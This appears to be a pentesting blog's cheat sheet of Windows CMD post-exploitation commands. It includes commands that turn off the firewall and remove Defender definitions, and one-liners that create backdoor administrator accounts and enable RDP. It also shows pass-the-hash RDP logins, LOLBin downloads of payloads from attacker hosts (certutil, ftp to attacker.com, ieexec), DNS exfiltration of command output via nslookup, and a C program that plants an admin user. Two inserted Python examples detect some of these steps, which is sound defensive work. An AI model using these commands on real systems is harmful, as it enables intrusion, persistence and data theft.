In this article I will list the most common basic CMD commands that Windows pentesters use. Because the article is very technical in nature, I will not explain each command in detail, only briefly what it does. If a command does not work for you, either (1) you entered the wrong syntax, or (2) the command is not installed on the system and so cannot be used.

System-related CMD commands for Pentester
First of all, why do you need to know these basic commands when hacking into Windows? Because once you have a shell on Windows, the next things you need to do are turning off the firewall, creating a backup user so you can log in again later…
So mastering the commands below will save the pentester time when exploiting Windows vulnerabilities.
Version and patch information
View system architecture: wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get architecture
Full system information: systeminfo
View OS name and version: systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
View patch: wmic qfe get Caption,Description,HotFixID,InstalledOn
Hostname: hostname
View third-party drivers: DRIVERQUERY
Environment
List all environment variables: set
Some env variables to know:
- COMPUTERNAME: Computer name
- TEMP/TMP: Temp folder (save temporary files)
- USERNAME: Username
- HOMEPATH/USERPROFILE: Home Links
- windir: C:\Windows
- LOGONSERVER: Name of domain controller
- USERDNSDOMAIN: Domain using DNS
- USERDOMAIN: Domain Name
DNS request for PC: nslookup %LOGONSERVER%.%USERDNSDOMAIN%
Connected drives
wmic logicaldisk get caption
wmic logicaldisk get caption,description,providername
Anti Virus
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
sc query windefend
Remove the Defender definitions (meant for machines without internet): "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Recycle Bin
dir C:\$Recycle.Bin /s /b
Processes, Services & Software
Details of scheduled tasks:
schtasks /query /fo LIST /v
schtasks /query /fo LIST 2>nul | findstr TaskName
schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
List of processes: tasklist /V
Processes that enable services: tasklist /SVC
Active Windows Services: net start
List of services: wmic service list brief or sc query
Installed 64bit software: dir /a "C:\Program Files"
Installed 32bit softwares: dir /a "C:\Program Files (x86)"
Installed software: reg query HKEY_LOCAL_MACHINE\SOFTWARE
Domain Information
echo %USERDOMAIN% #Domain name
echo %USERDNSDOMAIN% #Domain name when the computer is logged into a domain
echo %logonserver% #Domain controller name
set logonserver #Domain controller name
set log #Domain controller name
net groups /domain #List of domain groups
net group "domain computers" /domain #List of PCs joined to the domain
net view /domain #List of PCs in the domain
nltest /dclist:<DOMAIN> #List of domain controllers
net group "Domain Controllers" /domain #List of PC accounts of the domain controllers
net group "Domain Admins" /domain #List of users with domain admin privileges
net localgroup administrators /domain #List of admin groups inside the domain (including the "Domain Admins" group)
net user /domain #List of all domain users
net user <ACCOUNT_NAME> /domain #Information about a user
net accounts /domain #View the domain’s current password and login limit
nltest /domain_trust #Mapping domain relationships
Logs & Events
Query the security log using the given credentials: wevtutil qe security /rd:true /f:text /r:helpline /u:HELPLINE\zachary /p:0987654321
Users & Groups
Users
whoami /all #All information about you
whoami /priv #Show only privileges
net users #All users
dir /b /ad "C:\Users"
net user %username% #Information about the user (you)
net accounts #Information about the password policy
qwinsta #Is anyone else logged in?
cmdkey /list #List of stored credentials
net user /add [username] [password] #Create a user
#Open a new cmd.exe with the new creds (to impersonate in the network)
runas /netonly /user:<USERNAME>\administrator cmd
#Check the current logon sessions as administrator using logonsessions from Sysinternals
logonsessions.exe
logonsessions64.exe
Groups
#Local
net localgroup #All existing groups
net localgroup Administrators #Information about the group (admins)
net localgroup administrators [username] /add #Add a user to administrators
#Domain
net group /domain #Information about domain groups
net group /domain <domain_group_name> #Users belonging to the group
List of sessions
qwinsta
klist sessions
Password Policy
net accounts
Add users to the group
# Add a domain user to the Domain Admins group
net user username password /ADD /DOMAIN
net group "Domain Admins" username /ADD /DOMAIN
# Add a local user to the local Admins group
net user username password /ADD
net localgroup Administrators username /ADD
# Add a user to other groups:
net localgroup "Remote Desktop Users" UserLoginName /add
net localgroup "Debugger users" UserLoginName /add
net localgroup "Power users" UserLoginName /add
Network
Interfaces, Routes, Ports, Hosts and DNSCache
ipconfig /all #Information about the interfaces
route print #View the existing routes
arp -a #Information about hosts
netstat -ano #Open ports
type C:\WINDOWS\System32\drivers\etc\hosts
ipconfig /displaydns | findstr "Record" | findstr "Name Host"
Firewall
Information about the firewall and open ports:
netsh firewall show state
netsh advfirewall firewall show rule name=all
netsh firewall show config #Firewall information
Netsh Advfirewall show allprofiles
Turn off and on the firewall:
NetSh Advfirewall set allprofiles state off #Turn off the firewall
NetSh Advfirewall set allprofiles state on #Turn on the firewall
netsh firewall set opmode disable #Turn off the firewall
How to open ports:
netsh advfirewall firewall add rule name="NetBIOS UDP Port 138" dir=out action=allow protocol=UDP localport=138
netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=in action=allow protocol=TCP localport=139
netsh firewall add portopening TCP 3389 "Remote Desktop"
Enable Remote Desktop:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall add portopening TCP 3389 "Remote Desktop"
::netsh firewall set service remotedesktop enable #Not necessary
::sc config TermService start= auto #Unnecessary
::net start Termservice #Not necessary
Turn on Remote assistance:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh firewall set service remoteadmin enable
Ninja combo (new admin user, allow RDP + Rassistance + Firewall)
net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable
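The same chain (new local user, admin group membership, fDenyTSConnections set to 0, firewall opened for 3389) is what a defender should correlate in process-creation telemetry. The following is an added Python example, not code from the article; the records are constructed tuples standing in for parsed 4688 command lines, and the stage patterns, the 300-second window and the three-stage threshold are assumptions.

```python
"""Correlate process-creation records for the "new admin user + enable RDP + open
firewall" chain above (added example, not the article's own code). Records are
constructed (host, timestamp_seconds, command_line) tuples, as a parsed Windows
4688 event would give; stage patterns and the 5-minute window are assumptions."""
import re

# One case-insensitive regex per stage of the chain
STAGES = {
    "local_user_added": re.compile(r"\bnet\s+user\s+\S+\s+\S+\s+/add\b", re.I),
    "added_to_admins": re.compile(r"\bnet\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I),
    "rdp_enabled": re.compile(r"fDenyTSConnections\b.*\s/d\s+0\b", re.I),
    "firewall_opened": re.compile(r"\bnetsh\b.*(portopening\s+TCP\s+3389|allprofiles\s+state\s+off)", re.I),
}
WINDOW_SECONDS = 300
MIN_STAGES = 3

def classify(command_line):
    """Stages one command line matches; a '&'-joined one-liner hits several at once."""
    return {name for name, rx in STAGES.items() if rx.search(command_line)}

def correlate(records):
    """Per host, report the stages seen when >= MIN_STAGES distinct stages occur
    within WINDOW_SECONDS of each other. Returns {host: sorted stage names}."""
    per_host = {}
    for host, ts, cmd in sorted(records, key=lambda r: r[1]):
        hits = classify(cmd)
        if hits:
            per_host.setdefault(host, []).append((ts, hits))
    alerts = {}
    for host, events in per_host.items():
        for i, (t0, _) in enumerate(events):      # slide a window from each event
            seen = set()
            for ts, hits in events[i:]:
                if ts - t0 > WINDOW_SECONDS:
                    break
                seen |= hits
            if len(seen) >= MIN_STAGES:
                alerts[host] = sorted(seen)
                break
    return alerts

# Constructed sample: WS01 runs the chain step by step, WS02 only creates a user
SAMPLE = [
    ("WS01", 100, "net user svc_backup P@ssw0rd /add"),
    ("WS01", 130, "net localgroup administrators svc_backup /add"),
    ("WS01", 160, 'reg add "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'),
    ("WS01", 190, 'netsh firewall add portopening TCP 3389 "Remote Desktop"'),
    ("WS02", 500, "net user helpdesk Temp1234 /add"),
]
```

correlate(SAMPLE) flags WS01 with all four stages and stays silent on WS02, whose single net user call is below the threshold.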
Connect to RDP (using hash or password)
xfreerdp /u:alice /d:WORKGROUP /pth:b74242f37e47371aff835a6ebcac4ffe /v:10.11.1.49
xfreerdp /u:hacker /d:WORKGROUP /p:Hacker123! /v:10.11.1.49
Share
net view #Get the list of computers
net view /all /domain [domainname] #Shares on the domains
net view \\computer /ALL #List of shares on the computer
net use x: \\computer\share #Map a drive to the share
net share #Check current share
WIFI
netsh wlan show profile #View the SSIDs of previously connected Wi-Fi networks
netsh wlan show profile <SSID> key=clear #View the Wi-Fi password
SNMP
Read this article to learn what SNMP is.
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
Network Interfaces
ipconfig /all
ARP
arp -A
Download
Bitsadmin.exe
bitsadmin /create 1
bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe
bitsadmin /RESUME 1
bitsadmin /complete 1
CertReq.exe
CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
Certutil.exe
certutil.exe -urlcache -split -f "http://10.10.14.13:8000/shell.exe" s.exe
Desktopimgdownldr.exe
set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
Diantz.exe
diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab
Esentutl.exe
esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o
Expand.exe
expand \\webdav\folder\file.bat c:\ADS\file.bat
Extract32.exe
extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
Findstr.exe
findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe
Ftp.exe
cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
GfxDownloadWrapper.exe
C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"
Hh.exe
HH.exe http://some.url/script.ps1
ieexec.exe
ieexec.exe http://x.x.x.x:8080/bypass.exe
Makecab.exe
makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab
MpCmdRun.exe
MpCmdRun.exe -DownloadFile -url <URL> -path <path> //Windows Defender executable
Replace.exe
replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A
Excel.exe
Excel.exe http://192.168.1.10/TeamsAddinLoader.dll
Powerpnt.exe
Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll"
Squirrel.exe
squirrel.exe --download [url to package]
Update.exe
Update.exe --download [url to package]
Winword.exe
winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"
Wsl.exe
wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
Misc
cd #Current path
cd folder #Enter the folder
dir #List the folders and files in the current path
dir /a:h *path #List hidden files
dir /s /b #All paths inside the current directory
time #Current time
date #Current date
shutdown /r /t 0 #Shut down the computer immediately
type <file> #Read a file
Runas
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" #Use saved credentials
runas /netonly /user:<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted
Hide files
attrib +h file #Hide the file
attrib -h file #Unhide the file
Give full control over the files you have
icacls <FILE_PATH> /t /e /p <USERNAME>:F
icacls <FILE_PATH> /e /r <USERNAME> #Remove the permissions
Recursively copy files
xcopy /hievry C:\Users\security\.yawcam \\10.10.14.13\name\win
ADS (What is ADS?)
dir /r #Detect ADS
more file.txt:ads.txt #Read ADS
powershell (Get-Content file.txt -Stream ads.txt)
Listen-address ACLs
You can listen on http://+:80/Temporary_Listen_Addresses/ without admin rights
netsh http show urlacl
DNS shell
Use one of the following two options:
sudo responder -I <iface> #Active
sudo tcpdump -i <iface> -A proto udp and dst port 53 and dst ip <KALI_IP> #Passive
Victim
Trick with for /f tokens: it lets you execute a command, take the first X words of each output line and send them via DNS to your server.
for /f %a in ('whoami') do nslookup %a <IP_kali>
for /f "tokens=2" %a in ('echo word1 word2') do nslookup %a <IP_kali>
for /f "tokens=1,2,3" %a in ('dir /B C:\') do nslookup %a.%b.%c <IP_kali> #List the directories
for /f "tokens=1,2,3" %a in ('dir /B "C:\Program Files (x86)"') do nslookup %a.%b.%c <IP_kali> #List those directories
for /f "tokens=1,2,3" %a in ('dir /B "C:\Progra~2"') do nslookup %a.%b.%c <IP_kali> #Same as the previous command
#More complex commands
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('whoami /priv ^| findstr /i "enable"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali> #Same as the previous command
You can also redirect the output and then read it.
whoami /priv | findstr "Enab" > C:\Users\Public\Documents\out.txt
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('type "C:\Users\Public\Documents\out.txt"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali>
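Queries produced by this trick have a recognisable shape on the wire: the "hostname" is command output joined with dots, so its last label is not a real TLD, it often has many labels, and it goes to a resolver the client was never configured to use. The following is an added Python example, not the article's code, that scores constructed resolver-style log lines on those signals; the resolver allowlist, the TLD list and the thresholds are assumptions.

```python
"""Flag DNS queries shaped like the `for /f ... do nslookup %a.%b.%c <IP>` trick
above (added example, not part of the original article). Input records are
constructed resolver-style log lines: <timestamp> <client_ip> <dns_server_ip> <qname>.
The resolver allowlist, TLD list and thresholds are assumptions for this example."""
import re

ALLOWED_RESOLVERS = {"10.0.0.53"}                    # assumed corporate DNS servers
KNOWN_TLDS = {"com", "net", "org", "local", "arpa"}  # assumed minimal TLD set
MAX_LABELS = 4                                       # more labels than this looks tokenised
OUTPUT_WORDS = re.compile(r"privilege|enabled|users|windows|program", re.I)
LOG_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)$")

def query_reasons(server, qname):
    """Independent signals that this query carries command output rather than a hostname."""
    labels = qname.rstrip(".").split(".")
    reasons = []
    if server not in ALLOWED_RESOLVERS:
        reasons.append("sent to a non-corporate resolver")
    if labels[-1].lower() not in KNOWN_TLDS:
        reasons.append("last label is not a known TLD")
    if len(labels) > MAX_LABELS:
        reasons.append(f"{len(labels)} labels (tokenised command output?)")
    if any(OUTPUT_WORDS.search(label) for label in labels):
        reasons.append("label looks like `whoami /priv` or `dir` output")
    return reasons

def scan(log_text, min_signals=2):
    """Return [(client, server, qname, reasons)] for queries with >= min_signals signals;
    a single signal (e.g. an internal name with an odd TLD) is not enough on its own."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue          # skip blank or malformed records
        _, client, server, qname = m.groups()
        reasons = query_reasons(server, qname)
        if len(reasons) >= min_signals:
            findings.append((client, server, qname, reasons))
    return findings

# Constructed sample: one benign lookup, two resembling the tokens trick
SAMPLE_LOG = """\
2024-01-01T10:00:00 10.0.0.25 10.0.0.53 www.example.com.
2024-01-01T10:00:05 10.0.0.25 192.0.2.10 SeDebugPrivilege.Debug.programs.Enabled.
2024-01-01T10:00:06 10.0.0.25 192.0.2.10 Program.Files.Users.
"""

if __name__ == "__main__":
    for client, server, qname, reasons in scan(SAMPLE_LOG):
        print(f"{client} -> {server} {qname}: {'; '.join(reasons)}")
```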
Calling CMD from code C
#include <stdlib.h>
// When this file is executed by an Admin, the program creates a user and then adds that user to the Admin group
// i686-w64-mingw32-gcc addmin.c -o addmin.exe
// upx -9 addmin.exe
int main (){
int i;
i=system("net users otherAcc 0TherAcc! /add");
i=system("net localgroup administrators otherAcc /add");
return 0;
}
These are the basic pentest CMD commands for Windows; those who want to learn more about pentesting can join AnonyViet's new Discord server.